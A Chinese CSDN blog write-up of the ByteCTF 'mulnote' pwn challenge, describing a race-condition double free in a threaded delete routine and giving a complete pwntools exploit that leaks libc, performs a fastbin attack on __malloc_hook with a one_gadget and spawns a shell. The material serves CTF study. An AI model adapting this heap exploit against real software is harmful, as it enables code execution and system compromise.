mulheap WP

最新推荐文章于 2022-03-27 20:07:38 发布
最新推荐文章于 2022-03-27 20:07:38 发布
阅读量141 收藏
点赞数
分类专栏: 漏洞挖掘与利用 文章标签: ByteCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/100914569
版权

前言

  • 这题我当时在比赛的时候只停留于表象,结果被骗了,没有看出来漏洞,也没做出来,太亏了。结束后看到别人的题解,才发现还真是“水题”。

保护

在这里插入图片描述

分析

  • 程序使用 LLVM 编译的,开了控制流。但是根据字符串的提示,还是很容易找到各个操作对应的函数,影响不是很大。
  • 习惯性的只看反汇编代码,竟发现没有漏洞!!!而删除操作,貌似没有真的释放。
    在这里插入图片描述
  • 那怎么搞?后来才知道是 LLVM 把真相给掩藏起来了,需要动态调试跟一下才会发现端倪。
    在这里插入图片描述
  • 在执行删除操作的时候,释放指针的函数是放在线程中执行的。而这个线程函数明显存在一个典型的竞争漏洞。
    在这里插入图片描述
  • 在这 10s 的延时中可以形成 double free 漏洞,利用 fastbin attack 攻击就好了。

EXP

from pwn import*

context.log_level='debug'
p=process('./mulnote')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)

def Add(size,data):
    p.sendlineafter('>','C')
    p.sendlineafter('size>',str(size))
    p.sendlineafter('note>',data)
def Edit(idx,data):
    p.sendlineafter('>','E')
    p.sendlineafter('index>',str(idx))
    p.sendlineafter('note>',data)
def Del(idx):
    p.sendlineafter('>','R')
    p.sendlineafter('index>',str(idx))
def Show():
    p.sendlineafter('>','S')

Add(0x80,'c'*0x40)#0
Add(0x60,'a'*0x40)#1
Add(0x60,'b'*0x40)#2
Del(0)
Add(0x80,'')#0
Show()
p.recvuntil(':\n')
libc_base=u64(p.recv(6).ljust(8,'\0'))-2-libc.sym['__realloc_hook']
malloc_hook=libc.sym['__malloc_hook']+libc_base
success('libc_base:'+hex(libc_base))
system=libc.sym['system']
one=[0x45206,0x4525a,0xef9f4,0xf0897]
success('malloc_hook:'+hex(malloc_hook))
Del(1)
Del(2)
Del(1)
Add(0x60,p64(malloc_hook-0x1b-8))#4
Add(0x60,'')
Add(0x60,'')
Add(0x60,'a'*0x13+p64(one[0]+libc_base))

p.sendlineafter('>','C')
p.sendlineafter('size>','/bin/sh')

p.interactive()
  • 不过诡异的是 context.log_level=‘debug’ 这一句还不能去掉,否则无法泄露出内存;还有最后的 p.sendlineafter(‘size>’,’/bin/sh’) 中的第二个参数不能写成别的,可我修改的是 one_gadget 呀!已经自带有 /bin/sh 了。

总结

  • 眼见亦非实,不要停留于表面。带 LLVM 或者其他加花了的程序,能动态调试,最好还是调一遍,这样才不漏掉每一个隐蔽的地方!
飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WPInternals
11-06
WPInternals是国外网友开发的一款能够获取Win10手机系统Root权限的Win10手机Root解锁工具,并且能够在解锁引导程序后创建和刷自定义ROM的工具Windows Phone Internals,这款工具为刷机提供了便利。
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
上海大学生网络安全赛lgtwo
chennbnbnb的博客
11-15 304
程序分析 思路 有一个offset-by-one,但是题目没libc,应该只会是2.27与2.23 先尝试按照2.27的来试试 #! /usr/bin/python from pwn import * context.log_level = 'debug' context(arch='amd64', os='linux') #sh = process('./pwn') elf = ELF('./pwn') libc = ELF('./libc.so.6') sh = remo...
DelCTF2019 weapon WP
qq_41252520的博客
10-06 356
保护 分析 程序一共只有三个操作:增、删、改。又是没有泄露,看来又是利用IO_FILE泄露内存了。 漏洞还是很明显的,在删除操作中没有将free掉的指针置NULL 并且编辑的时候没有检测指针的合法性,因此形成了UAF。 在添加操作中限制了分配的大小 利用 程序中多处存在scanf函数,根据前面的文章可以知道,scanf可以帮我们得到一块unsortbin的chunk,我们构造的攻击链如...
DirectX11--HLSL中矩阵的内存布局和mul函数探讨
ahilll的博客
10-19 712
前言 说实话,我感觉这是一个大坑,不知道为什么要设计成这样混乱的形式。 在我用的时候,以row_major矩阵,并且mul函数以向量左乘矩阵的形式来绘制时的确能够正常显示,并不会有什么感觉。但是也有人会遇到明明传的矩阵没有问题,却怎么样都绘制不出的情况;或者使用列矩阵,在mul函数用向量左乘的形式却又可以绘制出来的疑问。因此本文目的就是要扫清这些障碍。 ps. 本问题由淡一抹夕霞提供。 Direc...
WP插件-站长必备免费WP插件
qq_787143156的博客
01-18 2551
如何利用WP插件做好SEO(搜索引擎优化)作为寻找新客户的关键策略。通过创建满足搜索条件并回答您的潜在客户提出的问题的内容,您就有机会赢得网站访问者并赢得他们的信任,SEO提供了丰富的见解、涉及链接构建、搜索引擎排名和关键字访问量。 利用WP插件可以为提高网站搜索引擎排名,如果您希望您的网站在Google、百度、Bing和Yahoo结果页面中快速轻松地出现,当您定期向网站介绍新的SEO内容时,搜素引擎会奖励您的努力和关心。如果网站与搜索字词相关且相关,则获得一致流量的几率会大大提高,并且可以理解.
WP模板,WP网站模板,WP网站主题模板
xiaomaseo的博客
03-27 1663
WP模板,能够全面响应,加上是现代,简洁的设计。丰富的实时定制选项集使站长可以轻松自定义主题。WP模板用Elementor制作:它引入了一种全新的可视化方式来设计WordPress网站。WP模板带有9个自定义的Elementor小部件。WP模板可用的选项有:两栏+侧栏,三栏(无侧栏),四栏(无侧栏)。WP模板使用类别支持项目自定义帖子类型,可以快速CSS砌体网格布局。 WP模板文件里面内置安装教程和多功能插件,可以直接运行无需安装,跟WordPress一整套整合起来的,WP模板支持免登录对接码等.
Wp.rar_wp
09-14
标题中的"Wp.rar_wp"可能是指一个名为"Wp"的RAR压缩文件,后缀"_wp"可能是用户为了标记或区分该文件而添加的自定义标识。这个压缩包内容与但丁滤波器设计有关,是一种在信号处理领域广泛应用的技术。 在描述中提到...
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
WP7连连看游戏
04-02
该源码实现一款现在很流行的一种游戏,WP7连连看游戏,游戏玩法很简单,只要我们需要找到相同的两张牌用三根以内的直线连在一起就可以消除,非常好玩,并且游戏的源码比较齐全,喜欢wp游戏开发的朋友可以下载学习看...
Windows10蓝屏事件分析
qq_41252520的博客
01-22 5874
Windows10 BSOD分析 近期突然曝出能够让Windows10系统拒绝服务的蓝屏符号链接:\.\globalroot\device\condrv\kernelconnect,只要在Google浏览器中输入这串字符串,电脑就会崩溃。上手就试,啪,很快啊~就崩溃了 注意到发生崩溃的驱动文件是condrv.sys\textcolor{orange}{condrv.sys}condrv.sys。打开内核调试器,重新尝试。 根据调用栈分析,在浏览器中输入这串字符串的时候,浏览器调用了GetFileAttri
74CMS 5.0.1后台getshell(CVE-2020-35339)分析
qq_41252520的博客
02-18 2817
0x0 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的
虎符CTF2020 部分题目复现(连续更新)
qq_41252520的博客
04-22 1685
PWN 0x0 MarksMan 【保护】: 【代码】: 很明显程序一开始就向我们泄露了libc的内存,如果通过检测,就可以任意地址写3个字节。如果能找到一处可控的调用,直接修改程one_gadget就可以了。 看看这个check检查了什么 这是过滤了部分字节,默认的one_gadget只能查看很少的可用地址,需要加上 -l参数,并指定一个较小的数字,如2,这样就能够得到更多可用地址。 现...
多线程中的栈溢出
qq_41252520的博客
03-08 1681
0x0 前置知识 我们都知道,在多线程下面修改一个全局变量会发生冲突的问题,而一般的解决方法就是给全局变量进行加锁。根据用途和策略,有读锁和写锁之分。这样子虽然解决了冲突的问题,但是不免过于麻烦。这就引入了一种叫做线程局部存储(ThreadLocalStorage)\textcolor{orange}{线程局部存储(Thread Local Storage)}线程局部存储(ThreadLocalStorage)的机制,即为每一个线程分配一个变量的实例,这种机制也可以避免上述的情况。该机制在不同的系统上面实现
CVE-2021-3156 sudo堆溢出分析与利用
qq_41252520的博客
01-29 1636
CVE-2021-3156 0x0 简介 sudo是Linux比较常用的命令,它允许普通用户获得临时的root身份执行特权指令,保障了Linux系统的安全。 0x1 漏洞复现 【环境】:ubuntu18.04 【版本】:sudo-1.8.27 ​ 输入以下POC: sudoedit -s '\' `perl -e 'print "A" x 65536'` 0x2 漏洞分析 (1)环境搭建 首先通过输入命令查看当前系统使用的版本 sudo --version 下载合适的sudo,解压并编译。 (2
CVE-2021-1732 分析
qq_41252520的博客
08-03 1186
文章目录CVE-2021-17320x0 漏洞描述0x1 受影响版本0x2 漏洞分析■ 环境■ 分析■ NtUserConsoleControl逆向分析■ xxxSetWindowLong逆向分析■ xxxSetWindowLongPtr逆向分析■ CreateWindowEx生成HWND分析■ CreateMenu逆向分析■ xxxGetMenuBarInfo逆向分析■ Win10 1909泄露内核■ 归纳几个重要的结构体及其偏移0x3 漏洞利用1.获取需要用到的函数地址2.HOOK目标函数3.精心构造3
windows内核提权(一)之栈溢出
qq_41252520的博客
04-24 821
前言 这个学期在做一个安全软件项目,涉及到windows的驱动开发,也因此项目为我敲开了windows内核的大门。这里面的东西奥妙无穷,亟待探索。 环境 HackSystem的作者专门为教学windows内核安全而写了一个漏洞驱动HEVD,里面包含了基本的堆栈溢出漏洞,并附带了EXP。我下载的是最新版的HEVD3.0。 windows7 32位 分析 首先使用IDA静态分析一下,找到D...
N1CTF2019——warmup WP
qq_41252520的博客
10-12 739
前言 国内实力战队出的题目质量都非常高,我不敢想象这就是pwn的签到题。首先说一下这道题如何质量高。这道题涉及到了double free、UAF、tcache attack、IO_FILE的利用。赛后复现用去了我差不多3天的时间来钻研。 保护 分析 程序只有增加、删除、编辑三个操作,并且保护全开,这种情况下只能利用IO_FILE来泄露内存。增加操作中已经限制了分配的大小: 漏洞有些隐蔽,...
RCTF-RCalc WP
qq_41252520的博客
07-28 599
保护 分析 IDA分析代码,部分函数名经过我的分析已被重置 这部分函数主要就是申请了两个,我称之为calc的结构,并给该结构中的buf成员申请空间。 这个函数很明显存在栈溢出,值得注意的是scanf("%s",v1)是以空格作为输入结束的标志,并且作者刻意实现了自定义的canary保护。在一开始随机一个数,存放在answer中,在尾部又从前面申请的calc结构中取出来进行对比 ...
Wp config file edit
最新发布
06-01
WP Config File Edit是一款WordPress插件,允许您通过WordPress后台编辑wp-config.php文件。使用此插件,您可以轻松地修改WordPress的配置,而无需通过FTP或SSH等方式连接到服务器。 安装和使用WP Config File Edit...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值